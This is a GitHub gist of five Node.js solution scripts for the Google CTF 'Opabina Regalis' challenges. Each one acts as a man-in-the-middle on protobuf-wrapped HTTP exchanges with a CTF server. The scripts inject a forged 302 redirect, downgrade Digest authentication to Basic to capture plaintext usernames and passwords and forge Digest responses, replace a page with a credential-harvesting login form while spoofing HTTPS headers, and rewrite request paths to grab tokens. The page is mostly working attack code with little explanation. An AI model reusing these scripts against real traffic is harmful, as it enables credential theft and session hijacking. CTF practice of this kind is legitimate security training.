Skip to content

Instantly share code, notes, and snippets.

@typcn

typcn/302.js

Last active May 1, 2016 19:34
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save typcn/5b158e1f2a04e537b8efaca1f906ac65 to your computer and use it in GitHub Desktop.
Save typcn/5b158e1f2a04e537b8efaca1f906ac65 to your computer and use it in GitHub Desktop.
Download ZIP
GCTF Opabina Regalis
Raw
302.js
var fs = require("fs");
var p = require("node-protobuf");
var pb = new p(fs.readFileSync("out.desc"));
var tls = require('tls');
var crypto = require('crypto');
var http = require("http");
var conn = tls.connect(13001, 'ssl-added-and-removed-here.ctfcompetition.com', (socket) => {
console.log('Connected');
});
var lastreq,lastres;
var realm,nonce,opaque;
conn.on("data", function (data) {
console.log(data.readUInt32LE(0), data.length);
var buf2 = data.slice(4);
var newObj = pb.parse(buf2, "main.Exchange");
console.log(newObj);
// console.log(data);
//
if(newObj.reply){
lastres = newObj.reply;
console.log(newObj.reply.headers);
console.log(newObj.reply.body.toString());
if(lastreq.request.uri != '/protected/secret'){
newObj.reply.status = 302;
newObj.reply.headers.push({
'key':'Location',
'value':'/protected/secret'
});
}
sendReq(newObj);
}else{
lastreq = newObj;
console.log(newObj.request.headers);
sendReq(newObj);
}
});
function sendReq(newObj) {
var bufx = pb.serialize(newObj, "main.Exchange");
var sb = new Buffer(bufx.length + 4);
sb.writeUInt32LE(bufx.length, 0);
bufx.copy(sb,4);
conn.write(sb);
}
conn.on("end", function (data) {
console.log('Disconnected');
});
Raw
Downgrade Attack.js
var fs = require("fs");
var p = require("node-protobuf");
var pb = new p(fs.readFileSync("out.desc"));
var tls = require('tls');
var crypto = require('crypto');
var http = require("http");
function md5(t) {
return crypto.createHash('md5').update(t).digest('hex');
}
function CalcPass(name,realm,pw,method,uri,nonce,nc,cnonce) {
var HA1= md5(name + ':' + realm + ':' + pw);
var HA2= md5(method + ':' + uri);
var response= md5(HA1 + ':' + nonce + ':' + nc + ':' + cnonce + ':' + 'auth' + ':' + HA2);
return response;
}
function getAuth(uname,realm, pw, nonce,method, uri,opaque) {
var p = CalcPass(uname, realm , pw , method, uri, nonce, '00000001', '0a4f113b');
var d = 'Digest username="' + uname + '",realm="' + realm + '",nonce="' + nonce + '",uri="' + uri + '",qop=auth,nc=00000001,cnonce="0a4f113b",response="' + p + '",opaque="' + opaque + '"';
return d;
}
var conn = tls.connect(20691, 'ssl-added-and-removed-here.ctfcompetition.com', (socket) => {
console.log('Connected');
});
var lastreq,lastres;
var realm,nonce,opaque;
conn.on("data", function (data) {
console.log(data.readUInt32LE(0), data.length);
var buf2 = data.slice(4);
var newObj = pb.parse(buf2, "main.Exchange");
console.log(newObj);
if(newObj.reply){
lastres = newObj.reply;
console.log(newObj.reply.headers);
console.log(newObj.reply.body.toString());
for (var i = 0; i < newObj.reply.headers.length; i++) {
var a = newObj.reply.headers[i];
if(a.key == 'WWW-Authenticate'){
var autharr = a.value.split(',');
for (var ix = 0; ix < autharr.length; ix++) {
if(!autharr[ix]){
continue;
}
var xa = autharr[ix].split('=');
var v = xa[1].replace(/\"/g,'');
var k = xa[0];
if(k == 'Digest realm'){
realm = v;
}else if(k == 'nonce'){
nonce = v;
}else if(k == 'opaque'){
opaque = v;
}
}
newObj.reply.headers[i].value = 'Basic realm=' + realm;
}
}
if(lastreq.reptime == 1){
return;
}else{
sendReq(newObj);
lastreq.reptime = 1;
}
}else{
newObj.request.uri = '/protected/secret';
for (var i in newObj.request.headers) {
var a = newObj.request.headers[i];
if(a.key == 'Authorization'){
var s = a.value.replace('Basic ','');
var b = new Buffer(s, 'base64').toString();
var uname = b.split(':')[0];
var pw = b.split(':')[1];
var av = getAuth(uname,realm,pw,nonce,'GET',newObj.request.uri,opaque);
newObj.request.headers[i].value = av;
}
}
lastreq = newObj;
console.log(newObj.request.headers);
sendReq(newObj);
}
});
function sendReq(newObj) {
var bufx = pb.serialize(newObj, "main.Exchange");
var sb = new Buffer(bufx.length + 4);
sb.writeUInt32LE(bufx.length, 0);
bufx.copy(sb,4);
conn.write(sb);
}
conn.on("end", function (data) {
console.log('Disconnected');
});
Raw
Input Validation.js
var fs = require("fs");
var p = require("node-protobuf");
var pb = new p(fs.readFileSync("out.desc"));
var tls = require('tls');
var crypto = require('crypto');
var http = require("http");
function md5(t) {
return crypto.createHash('md5').update(t).digest('hex');
}
function CalcPass(name,realm,pw,method,uri,nonce,nc,cnonce) {
var HA1= md5(name + ':' + realm + ':' + pw);
var HA2= md5(method + ':' + uri);
var response= md5(HA1 + ':' + nonce + ':' + nc + ':' + cnonce + ':' + 'auth' + ':' + HA2);
return response;
}
function getAuth(uname,realm, pw, nonce,method, uri,opaque) {
var p = CalcPass(uname, realm , pw , method, uri, nonce, '00000001', '0a4f113b');
var d = 'Digest username="' + uname + '",realm="' + realm + '",nonce="' + nonce + '",uri="' + uri + '",qop=auth,nc=00000001,cnonce="0a4f113b",response="' + p + '",opaque="' + opaque + '"';
return d;
}
var conn = tls.connect(12001, 'ssl-added-and-removed-here.ctfcompetition.com', (socket) => {
console.log('Connected');
});
var lastreq,lastres;
var realm,nonce,opaque;
conn.on("data", function (data) {
console.log(data.readUInt32LE(0), data.length);
var buf2 = data.slice(4);
var newObj = pb.parse(buf2, "main.Exchange");
console.log(newObj);
if(newObj.reply){
lastres = newObj.reply;
console.log(newObj.reply.headers);
console.log(newObj.reply.body.toString());
for (var i = 0; i < newObj.reply.headers.length; i++) {
var a = newObj.reply.headers[i];
if(a.key == 'WWW-Authenticate'){
var autharr = a.value.split(',');
for (var ix = 0; ix < autharr.length; ix++) {
if(!autharr[ix]){
continue;
}
var xa = autharr[ix].split('=');
var v = xa[1].replace(/\"/g,'');
var k = xa[0];
if(k == 'Digest realm'){
realm = v;
}else if(k == 'nonce'){
nonce = v;
}else if(k == 'opaque'){
opaque = v;
}
}
newObj.reply.headers[i].value = 'Basic realm=' + realm;
}
}
if(lastreq.reptime == 1){
return;
}else{
sendReq(newObj);
lastreq.reptime = 1;
}
}else{
newObj.request.uri = '/protected/token';
for (var i in newObj.request.headers) {
var a = newObj.request.headers[i];
if(a.key == 'Authorization'){
var s = a.value.replace('Basic ','');
var b = new Buffer(s, 'base64').toString();
var uname = b.split(':')[0];
var pw = b.split(':')[1];
var av = getAuth(uname,realm,pw,nonce,'GET',newObj.request.uri,opaque);
newObj.request.headers[i].value = av;
}
}
lastreq = newObj;
console.log(newObj.request.headers);
sendReq(newObj);
}
});
function sendReq(newObj) {
var bufx = pb.serialize(newObj, "main.Exchange");
var sb = new Buffer(bufx.length + 4);
sb.writeUInt32LE(bufx.length, 0);
bufx.copy(sb,4);
conn.write(sb);
}
conn.on("end", function (data) {
console.log('Disconnected');
});
Raw
SSL Stripe.js
var fs = require("fs");
var p = require("node-protobuf");
var pb = new p(fs.readFileSync("out.desc"));
var tls = require('tls');
var crypto = require('crypto');
var http = require("http");
var net = require('net');
var conn = tls.connect(19121, 'ssl-added-and-removed-here.ctfcompetition.com', (socket) => {
console.log('Connected');
});
var lastreq,lastres;
var realm,nonce,opaque;
conn.on("data", function (data) {
console.log(data.readUInt32LE(0), data.length);
var buf2 = data.slice(4);
var newObj = pb.parse(buf2, "main.Exchange");
console.log(newObj);
if(newObj.reply){
lastres = newObj.reply;
newObj.reply.body = ' <form method="POST" action="http://elided/user/sign_in" class="navbar-form navbar-right">\
<div class="form-group">\
<input name="email" type="text" placeholder="Email" class="form-control">\
</div>\
<div class="form-group">\
<input type="password" name="password" placeholder="Password" class="form-control">\
</div>\
<button type="submit" class="btn btn-success">Sign in</button>\
</form>\
';
console.log(newObj.reply.headers);
console.log(newObj.reply.body.toString());
sendReq(newObj);
}else{
newObj.request.headers.push({
'key':'X-Forwarded-Proto',
'value':'https'
});
newObj.request.headers.push({
'key':'scheme',
'value':'https'
});
lastreq = newObj;
console.log(newObj.request.headers);
sendReq(newObj);
}
});
function sendReq(newObj) {
var bufx = pb.serialize(newObj, "main.Exchange");
var sb = new Buffer(bufx.length + 4);
sb.writeUInt32LE(bufx.length, 0);
bufx.copy(sb,4);
conn.write(sb);
}
conn.on("end", function (data) {
console.log('Disconnected');
});
Raw
Token Fetch.js
var fs = require("fs");
var p = require("node-protobuf");
var pb = new p(fs.readFileSync("out.desc"));
var tls = require('tls');
var conn = tls.connect(1876, 'ssl-added-and-removed-here.ctfcompetition.com', (socket) => {
console.log('Connected');
});
conn.on("data", function (data) {
console.log(data.readUInt32LE(0), data.length);
var buf2 = data.slice(4);
var newObj = pb.parse(buf2, "main.Exchange");
console.log(newObj);
if(newObj.reply){
console.log(newObj.reply.headers);
console.log(newObj.reply.body.toString());
}else{
newObj.request.uri = '/token';
var bufx = pb.serialize(newObj, "main.Exchange");
var sb = new Buffer(bufx.length + 4);
sb.writeUInt32LE(bufx.length, 0);
bufx.copy(sb,4);
console.log(sb);
console.log(bufx.length,sb.length);
conn.write(sb);
}
});
conn.on("end", function (data) {
console.log('Disconnected');
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment